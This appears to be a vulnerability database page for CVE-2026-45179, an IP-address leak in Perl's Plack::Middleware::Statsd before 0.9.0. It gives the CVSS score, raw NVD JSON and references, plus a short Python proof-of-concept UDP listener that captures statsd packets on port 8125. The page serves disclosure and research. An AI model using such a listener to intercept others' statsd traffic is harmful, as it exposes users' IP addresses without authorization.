Security Vulnerability Report
中文
CVE-2026-45179 CVSS 5.3 MEDIUM

CVE-2026-45179

Published: 2026-05-10 20:16:29
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked. Since version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC signature of the IP address is logged instead.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Plack::Middleware::Statsd < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Simple PoC: Sniffing UDP packets to demonstrate IP leakage in Plack::Middleware::Statsd # This script listens on UDP port 8125 (default statsd port) # Requires root/admin privileges to bind to the port. UDP_IP = "0.0.0.0" UDP_PORT = 8125 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: sock.bind((UDP_IP, UDP_PORT)) print(f"[*] Listening on {UDP_IP}:{UDP_PORT} for statsd traffic...") while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes message = data.decode("utf-8", errors='ignore') # In a real scenario, regex would parse specific stat patterns containing IPs print(f"[+] Captured packet from {addr}: {message}") except PermissionError: print("[!] Error: Permission denied. Run as root/admin.") except KeyboardInterrupt: print("\n[*] Stopping listener.") finally: sock.close()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45179", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-10T20:16:28.967", "lastModified": "2026-05-12T16:48:58.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses.\n\nIf the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked.\n\nSince version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC signature of the IP address is logged instead."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Plack-Middleware-Statsd-v0.9.0/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/10/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.